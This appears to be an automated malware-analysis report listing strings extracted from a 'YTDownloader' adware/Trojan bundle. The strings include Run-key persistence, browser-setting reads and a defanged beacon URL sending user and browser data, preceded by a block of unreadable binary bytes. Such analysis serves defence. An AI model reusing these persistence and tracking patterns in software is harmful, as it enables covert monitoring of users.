..".....R..o.b......q.....D.^kTM.T2.......7.U..eV.c...[..f.b..I..N.S..
.hJ7.**.{..z$].h7.....0U....7.E.Kk.8oNM..).......4..:2g.'.Fp...pg....x
..b.s.&..t..m.3 ..#9...i...d.....[6z.........8kZ@. ....kq...l...:...5.
r.T....A.z......3..~....Dx..2O..o..p.|..*...#p!...\...7v..WQ'.>....
.\a.).|.)T>..h....!W.....p...wPY89.P5V....g'.....7..7..yN-.......m.
B.|.'B {P.MB5...:O....<s...D\w.....$EK.3E[&\.........XB....L..*B...
....E....w....TE...r..x.y.m...h|..0.hriZ,]...t...xFKe..j.\#.0<.fL..
.f.y..5V.[5p....n....g..4.k.g.....J$........{R.....#._?.J:?..^]Dg..../
s.*.j....Zf @oL.h....M.........An......"....p...q.....A:...s..T2FV...G
{.7.N.Rb........V.|.]%.z$=p.&.. ..!\....j....)...$i...~...............
..'m..G.?g.....r ........Lf.. ..G^.$n..D.G...mS...LP.8.=.B...U.g/.S. _
-.D...b.dg/...;[email protected].*.... .....B...l.m.)E...`......~.%
....H.QlZ|=%..P.......(.../.D..<.6..\V...^........,#[email protected].
.kai..K{...............%.........H....~%.(IA..^ .{.a.s._V.....z$.%....
z........]A...`....!.*.........qi.f.<@a.-t'.~.........Q\...m..U<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

BROWSE~2.EXE_2880:

.text

`.rdata

@.data

.rsrc

@.reloc

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

Process token open Error: %u

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb

KERNEL32.dll

USER32.dll

ADVAPI32.dll

GetProcessHeap

GetCPInfo

zcÁ

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

4 5 52585>5

01S1|3

Amscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

BrowserHelper.exe

explorer.exe

Software\Microsoft\Windows\CurrentVersion\Run

e:%d s:%d

\BrowserHelper.exe

C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_140:

.text

`.rdata

@.data

.rsrc

@.reloc

j.Yf;

_tcPVj@

.PjRW

Higher: %x

Lower: %x

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb

WinExec

KERNEL32.dll

SetWindowsHookExW

UnhookWindowsHookEx

USER32.dll

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegOpenKeyW

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

HttpOpenRequestW

HttpAddRequestHeadersW

HttpSendRequestW

HttpSendRequestExW

HttpEndRequestW

HttpQueryInfoW

WININET.dll

VERSION.dll

PSAPI.DLL

GetCPInfo

GetProcessHeap

zcÁ

.?AVCHttp@@

C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

2/2P3z3

"1*1/141

C1k1y1<3\3c3k3p3t3x3

2%2x2

= >->2>@>

6$6-626?6

;%; ;5;@;

4 4,40444

@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Windows 95

Windows 98

Windows Me

Windows NT

Windows 2000

Windows XP

Windows 2003 Server

Windows Vista

Windows 7

Windows CE

%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

ConfigDB.dll

config.xml

<d/d/%d d:d:d::d 0x%X>

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

kernel32.dll

WININET.DLL

user32.dll

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

PipeName

[CUtils::GetDAPPipeName] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

%d.%d.%d.%d

"%s" "%s"

d/d/%d d:d:d::d

"%s" %s

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

%d-d-d

0.0.0.0

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe

%Program Files%\Internet Explorer\IEXPLORE.EXE

http\shell\open\command

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk

Mozilla Firefox

Google Chrome

explorer.exe

&exe%d=%s&ver%d=%s&arr%d=%s

&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d

hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?

BrowserHelper.txt

BrowserHelperBk.txt

Chrome

Mozilla

iexplore.exe

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

%s?e=%s

zvl=%s&

1.7.0.0

Updater.exe

YTDownloader.exe_2468:

.text

`.rdata

@.data

.idata

.rsrc

@.reloc

SSShh

WSSh(

SPSSh

.tMHtJH

F><.tN<[tJ<\tF<*tB<|t><^t:<$t6

FTPQ

tL<%u@

9>t.hp

;NTu^SSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

1.3.6.1.4.1.311.2.1.12

1.2.840.113549.1.9.5

1.2.840.113549.1.9.6

CRtmpParser::GetFieldDataString

CRtmpParser::GetFieldDataNumber

NetStream.Play.Reset

NetStream.Unpause.Notify

NetStream.Pause.Notify

NetStream.Seek.Notify

NetStream.Play.Stop

NetStream.Play.Failed

NetStream.Failed

()$^.* ?[]|\-{},:=!

video/WebM

"url_encoded_fmt_stream_map": "(.*?)"

rtmpe%3Dyes

url_encoded_fmt_stream_map=

%s, string reference, index: %d, not supported, ignoring!

%s - AMF3 unknown/unsupported datatype 0xx, @%p

AMF3_DATE reference: %d, not supported!

Property: <%s%s>

timestamp: %.2f, UTC offset: %d

INVALID TYPE 0xx

Property: <%sSTRICT_ARRAY>

Property: <%sECMA_ARRAY>

Property: <%sOBJECT>

AMF_Encode - failed to encode property in index %d

%s, invalid type. %d

%s, failed to decode AMF3 property!

Member: %s

Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d

Class reference: %d

Object reference, index: %d

%s: Empty buffer/no buffer pointer!

%s - unknown datatype 0xx, @%p

AMF_TYPED_OBJECT not supported!

AMF_REFERENCE not supported!

%s: Name size out of range: namesize (%d) > len (%d) - 2

%s: Not enough data for decoding with name, less than 4 bytes!

HTTP/1

%s, Setting socket timeout to %ds failed!

%s, No SSL/TLS support

HTTP_get

If-Modified-Since: %s

GET %s HTTP/1.0

User-Agent: %s

Host: %s

Mozilla/5.0

%s, d %s %d d:d:d GMT

size: x

date: %s

ctim: %s

url: %.*s

%s: couldn't open %s for writing, errno %d (%s)

%s: couldn't contact swfurl %s (HTTP error %d)

%s: swfurl %s not found

%s: connection lost while downloading swfurl %s

1.1.4

%s%s\.swfinfo

%s: %s

hXXp://

[[IMPORT]]

No application or playpath in URL!

Invalid port number!

No hostname in URL!

Parsed protocol: %d

RTMP URL: No :// in url!

NetConnection.confStream

NetStream.Publish.Start

NetStream.Play.UnpublishNotify

NetStream.Play.PublishNotify

NetStream.Play.Complete

NetStream.Play.Start

NetConnection.Connect.InvalidApp

NetStream.Play.StreamNotFound

NetStream.Authenticate.UsherToken

Publisher password

pubPasswd

Key for SecureToken response

Justin.tv authentication token

URL to player SWF file

swfUrl

URL of played media's web page

pageUrl

URL to played stream

tcUrl

DH public key does not fulfill y^q mod p = 1

DH public key must be at most p-2

DH public key must be at least 2

RC4 In Key:

RC4 Out Key:

%s: Couldn't calculate correct DH offset (got %d), exiting!

%s: Couldn't calculate correct digest offset (got %d), exiting

%s: Couldn't calculate DH offset (got %d), exiting!

%s: Couldn't calculate digest offset (got %d), exiting!

RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx

Connecting via SOCKS proxy: %s:%d

SWFSize : %u

live : %s

StopTime : %d msec

StartTime : %d msec

flashVer : %s

NetStream.Authenticate.UsherToken : %s

subscribepath : %s

auth : %s

pageUrl : %s

swfUrl : %s

tcUrl : %s

Playpath : %s

Port : %d

Protocol : %s

s %-7s %s

Unknown option %s

%s://%.*s:%d/%.*s

Problem accessing the DNS. (addr: %s)

%s, error

%s, Authentication failed: unknown auth mode: %s

%s, Authentication failed

%s, new app: %.*s tcUrl: %.*s playpath: %s

&nonce=%s&cnonce=%s&nc=%s&response=%s

%s, md5(%s:%s:%s:%s:%s:%s) =>

%s, md5(%s:/%.*s) =>

%s, md5(%s:%s:%s) =>

%s, pubToken1: %s

?%s&user=%s

%s, Authentication failed: no such user

%s, Authentication failed: wrong password

%s, pubToken2: %s

&challenge=%s&response=%s&opaque=%s

%s, b64(md5_2) = %s

%s, b64(%d) = %s

%s, b64(md5_1) = %s

%s, md5(%s%s%s) =>

%s, par:"%s" = val:"%s"

%s, need to set pubUser & pubPasswd for publisher auth

%s, wrong pubUser & pubPasswd for publisher auth

%-22.*s%s

%s, error decoding meta data packet

%s, received: chunk size change to %d

%s: server BW = %d

%s: client BW = %d %d

%s, recv returned %d. GetSockError(): %d (%s)

POST /%s%s/%d HTTP/1.1

Host: %.*s:%d

Content-length: %d

HTTP/1.1 200

%s, RTMP send error %d (%d bytes)

%s: fd=%d, size=%d

Invoking %s

sanity failed!! trying to send header of type: 0xx.

%s, failed to allocate packet

FCSubscribe: %s

UsherToken: %s

%s, %d, pauseTime=%d

%s, seekTime=%d, stopTime=%d, sending play: %s

sending ctrl. type: 0xx

%s: Ignoring SWFVerification request, use --swfVfy!

%s: SWFVerification Type %d request not supported! Patches welcome...

%s, SWFVerification ping received:

%s, Stream Begin %d

%s, Stream EOF %d

%s, Stream Dry %d

%s, Stream IsRecorded %d

%s, Ping %d

%s, Stream BufferEmpty %d

%s, Stream BufferReady %d

%s, Stream xx %d

%s, received ctrl. type: %d, len: %d

%s, RTMP socket closed by peer

%s, No valid HTTP response found

%s, failed to read RTMP packet body. len: %u

%s, failed to read extended timestamp

%s, failed to read RTMP packet header. type: %x

%s, m_nChannel: %0x

%s, failed to read RTMP packet header 3nd byte

%s, failed to read RTMP packet header 2nd byte

%s, failed to read RTMP packet header

%s: fd=%d

%s: client signature does not match!

%s: Handshaking finished....

%s: Genuine Adobe Flash Media Server

%s: Server not genuine Adobe!

%s: Signature calculated:

%s: Digest key:

%s: Server sent signature:

%s: Wait, did the server just refuse signed authentication?

%s: Client signature calculated:

%s: Calculated digest key from secure key and server digest:

%s: Secret key:

%s: Wrong secret key position!

%s: Server DH public key offset: %d

%s: FMS Version : %d.%d.%d.%d

%s: Server Uptime : %d

%s: Type mismatch: client sent %d, server answered %d

%s: Type Answer : X

%s: Initial client digest:

%s: Client digest offset: %d

%s: Couldn't write public key!

%s: Couldn't generate Diffie-Hellmann public key!

%s: DH pubkey position: %d

%s: Couldn't initialize Diffie-Hellmann!

%s: Client type: X

%s: Genuine Adobe Flash Player

%s: Client not genuine Adobe!

%s: Client sent signature:

%s: 2nd handshake:

%s: Sending handshake response:

%s: Server signature calculated:

%s: Client DH public key offset: %d

%s: Player Version: %d.%d.%d.%d

%s: Client Uptime : %d

%s: Initial server digest:

%s: Server digest offset: %d

%s: Unknown version x

%s: Type Requested : X

%s, RTMP connect failed.

%s, handshaked

%s, handshake failed.

%s, ... connected, handshaking

%s, Could not connect for handshake

%s, no SSL/TLS support

%s, SOCKS returned error code %d

%s, failed to create socket. Error: %d

%s, SOCKS negotiation failed.

%s ... SOCKS negotiation

%s, failed to connect socket. %d (%s)

Closing connection: %s

%s, onStatus: %s

trying to connect with redirected url

%s, error description: %s

%s, received error for method call <%s>

%s, received result id %f without matching request

%s, received result for method call <%s>

%s, server invoking <%s>

%s, error decoding invoke packet

%s, Sanity failed. no string method in invoke packet

%s, flex shared object, size %u bytes, not supported, ignoring

%s, flex message, size %u bytes, not fully supported

%s, received: notify %u bytes

%s, shared object, not supported, ignoring

%s, received: invoke %u bytes

%s, unknown packet type received: 0xx

%s, flex stream send, size %u bytes, not supported, ignoring

%s, received: bytes read report

Wrong data size (%u), stream corrupted, aborting!

Couldn't find the seeked keyframe in this chunk!

First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?

FLV Stream: Keyframe doesn't match!

Found keyframe with resume-keyframe timestamp!

Checked keyframe successfully!

ignoring too small audio packet: size: %d

ignoring too small video packet: size: %d

Got Play.Complete or Play.Stop from server. Assuming stream is complete

%s: Failed to close listening socket, error %d

Caught signal: %d, cleaning up, just a second...

-c, --cert cert RTMPS cert

-k, --key key RTMPS key

-p, --port port Overrides the port in the rtmp url

%s, _beginthread failed with %d

Unknown command '%c', ignoring

-o %s

-j "%s"

-p "%s"

-W "%s"

-f "%s"

-a "%s"

-r "%s"

%s, client invoking <%s>

%s, received packet type X, size %u bytes

%s: accept failed

%s: processed request

%s: accepted connection from %s

%s, listen failed

%s, TCP bind failed for port number: %d

%s, couldn't create socket

chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe

._-$,;~()

.mpeg

video/webm

.webm

.xslt

.json

audio/x-mpegurl

.torrent

.jpeg

.shtml

.shtm

.html

url_rewrite_patterns

ssl_certificate

listening_ports

index.html,index.htm,index.cgi,index.shtml,index.php,index.lp

**.shtml$|**.shtm$

mydomain.com

**.cgi$|**.pl$|**.php$

SSL_CTX_use_certificate_chain_file

SSL_CTX_set_default_passwd_cb

SSL_CTX_use_certificate_file

SSL_CTX_use_PrivateKey_file

%s %s:

[0lu] [error] [client %s]

%.*s%s

%d-%3s-%d %d:%d:%d

%*3s, %d %3s %d %d:%d:%d

%d %3s %d %d:%d:%d

%d/%3s/%d %d:%d:%d

%[^:]:%[^:]:%s

HTTP/1.1 401 Unauthorized

WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"

%s:%s:%s

%s.tmp

<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>

%d-%b-%Y %H:%M

**.htpasswd$

%s%c%s

%a, %d %b %Y %H:%M:%S GMT

HTTP/

%s: CGI env buffer truncated for [%s]

HTTP_%s=%s

REMOTE_USER=%s

PERLLIB=%s

SystemDrive=%s

SYSTEMROOT=%s

COMSPEC=%s

PATH_INFO=%s

PATH=%s

CONTENT_LENGTH=%s

QUERY_STRING=%s

CONTENT_TYPE=%s

HTTPS=%s

PATH_TRANSLATED=%s

SCRIPT_FILENAME=%s

SCRIPT_NAME=%.*s%s

REQUEST_URI=%s

REMOTE_PORT=%d

REMOTE_ADDR=%s

REQUEST_METHOD=%s

SERVER_PORT=%d

SERVER_PROTOCOL=HTTP/1.1

DOCUMENT_ROOT=%s

SERVER_ROOT=%s

SERVER_NAME=%s

Cannot SSI #exec: [%s]: %s

Bad SSI #exec: [%s]

HTTP/1.1 200 OK

<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>

HTTP/1.1 207 Multi-Status

%d.%d.%d.%d%n

%d.%d.%d.%d/%d%n

%lf%c

%s/%s

boundary=™s

HTTP/1.1 302 Found

Location: hXXps://%s:%d%s

24[^:]

%d.%d.%d.%d:%d%n

Cannot add SSL socket, is -ssl_certificate option set?

%s: %.*s: invalid port spec. Expecting list of: %s

[IP_ADDRESS:]PORT[s|p]

%s: cannot bind to %.*s: %s

set_ports_option

%s - %s [%s] "%s %s HTTP/%s" %d %I64d

%d/%b/%Y:%H:%M:%S %z

%s: subnet must be [ |-]x.x.x.x[/x]

Cannot open %s: %s

calloc(): %s

connect(%s:%d): %s

socket(): %s

gethostbyname(%s): %s

%s: %s is not allowed to connect

HTTP/1.1 %d %s

Content-Length: %d

Connection: %s

Error %d: %s

%s: CreateProcess(%s): %ld

%s%s%s\%s

%.*s%c%s

.htpasswd

fopen(%s): %s

%s: cannot open %s: %s

<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>

<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>

Error: opendir(%s): %s

Date: %s

Last-Modified: %s

Etag: %s

HTTP/1.1 100 Continue

Cannot create CGI pipe: %s

fopen: %s

CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]

Cannot spawn CGI process [%s]: %s

put_dir(%s): %s

HTTP/1.1 %d OK

Bad SSI #include: [%s]

Cannot open SSI #include: [%s]: fopen(%s): %s

%s: SSI tag is too large

%s: unknown SSI command: "%s"

SSI #include level is too deep (%s)

Method %s is not implemented

HTTP/1.1 301 Moved Permanently

Location: %s/

remove(%s): %s

Bad HTTP version

Bad HTTP version: [%s]

Invalid URI: [%s]

%s: option value cannot be NULL

Invalid option: %s

warning: %s: duplicate option

Hello from mongoose! Remote port: %d

HttpSendRequestW failed with error code

HttpOpenRequestW failed with error code

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

1.2.5

inflate 1.2.5 Copyright 1995-2010 Mark Adler

Visual C   CRT: Not enough memory to complete call to strerror.

cmd.exe

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb

.?AVCHttp@@

<>"#{}|\^~[]`' ?&

.?AVCRtmpe@@

.?AV?$IBaseInterface@VIKeysBank@@@@

.?AVIKeysBank@@

.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@

.?AVCKeysBank@@

.?AVCRtmpDataProperty@@

.?AVCRtmpPacket@@

.?AVCRtmpParser@@

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

HTTP://

.?AVHttpParser@@

.?AVCHttpDownload@@

zcÁ

WinExec

CreatePipe

KERNEL32.dll

MsgWaitForMultipleObjectsEx

EnumChildWindows

USER32.dll

GDI32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegOpenKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WS2_32.dll

LIBEAY32.dll

HttpEndRequestW

HttpQueryInfoW

HttpSendRequestW

HttpSendRequestExW

HttpAddRequestHeadersW

HttpOpenRequestW

WININET.dll

VERSION.dll

CertGetNameStringW

CertFreeCertificateContext

CryptMsgClose

CertCloseStore

CertFindCertificateInStore

CryptMsgGetParam

CRYPT32.dll

PSAPI.DLL

IsValidURL

urlmon.dll

GdiplusShutdown

gdiplus.dll

GetCPInfo

GetProcessHeap

nnn%XXX

pppaSSS

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

89x9

0-161T1k1}1

0(191?1`2

8&9-9}9

<041&3.3

;$;(;,;0;4;8;<;@;

<(</<4<8<<<]<

<&=,=0=4=8=

= =$=(=,=0=4=8=

: :(:,:0;4;

? ?$?,?0?8?<?

? ?(?,?0?

1 2,242\2

?$?0?8?`?

8(848\8|8

0$000\0|0

>(>4><>`>

?$?<?@?\?`?

0 0@0`0|0

3 3@3`3|3

1$1,141<1

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

Content-Disposition: form-data; name="%s"

XXX

Content-Type: multipart/form-data; boundary=%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Windows CE

Windows 7

Windows Vista

Windows 2003 Server

Windows XP

Windows 2000

Windows NT

Windows Me

Windows 98

Windows 95

%sLow\%s\

%C:\Users\Public\Documents\%s\%s\

%s\%s\%s\

%s\Application Data\%s\%s\

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

ConfigDB.dll

config.xml

%%X

<d/d/%d d:d:d::d 0x%X>

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

\StringFileInfo\x\%s

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::BackupTraceFile] %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

CertGetNameString failed.

CryptDecodeObject failed with %x

CertFindCertificateInStore failed with %x

MoreInfo Link : %s

Publisher Link : %s

Program Name : %s

CryptMsgGetParam failed with %x

CryptQueryObject failed with %x

user32.dll

WININET.DLL

kernel32.dll

d/d/%d d:d:d::d

%d.%d.%d.%d

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

"%s" "%s"

"%s" %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPPipeName] Name: %s

PipeName

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey

[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CClientRtmpe::operator =] Key Out: %p

[CClientRtmpe::operator =] Key In:

[CClientRtmpe::operator =]

[CClientRtmpe::OnHandshake] Step 3 - update the keystreams

[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 2 - Client version: %x

[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d

[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d

[CKeysBank::Work] Exit...

[CKeysBank::Work] Enter...

[CKeysBank::Start]

[CKeysBank::Stop]

[CKeysBank::GetPublicKey] Remove Key, Total: %d

[CKeysBank::GenerateKey] Add Key, Total: %d

[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey

[CKeysBank::GenerateKey] ___Error DiffieHellman.Init

[CRtmpe::operator =] Key Out: %p

[CRtmpe::operator =] Key In:

[CRtmpe::operator =]

[CRtmpe::Initialize] Cache Writer: %p

[CRtmpe::ParseHeader] Protocol - RTMPE

[CRtmpe::ParseHeader] Protocol - RTMP

[CRtmpe::ParseHeader]

[CRtmpe::ParseData] Got all %d/%d bytes

[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpe::ParseData]

[CRtmpe::Encrypt] Encryped %d bytes, Key: %p

[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p

[CRtmpe::ParseBuffer] Analyze Next Packet...

[CRtmpe::HandShake] Step 1: Complete

[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server

[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey

[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CRtmpe::HandShake] Step 1: Start...

[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes

[CRtmpe::UpdateBuffer] Handshake already completed

[CRtmpe::UpdateBuffer] Analyzing %d bytes...

[CRtmpStream::OnHandShake] ___Error - Unknown step

[CRtmpe::OnHandshake] Step 3 - Complete

[CRtmpe::OnHandshake] Step 3 - update the keystreams

[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption

[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey

[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CRtmpe::OnHandshake] ___Error Step 3: Writing client response

[CRtmpe::OnHandshake] Step 3: Start...

[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***

[CRtmpe::OnHandshake] ___Warning - server version

[CRtmpe::OnHandshake] ___Error Step 2: Reading server response

[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***

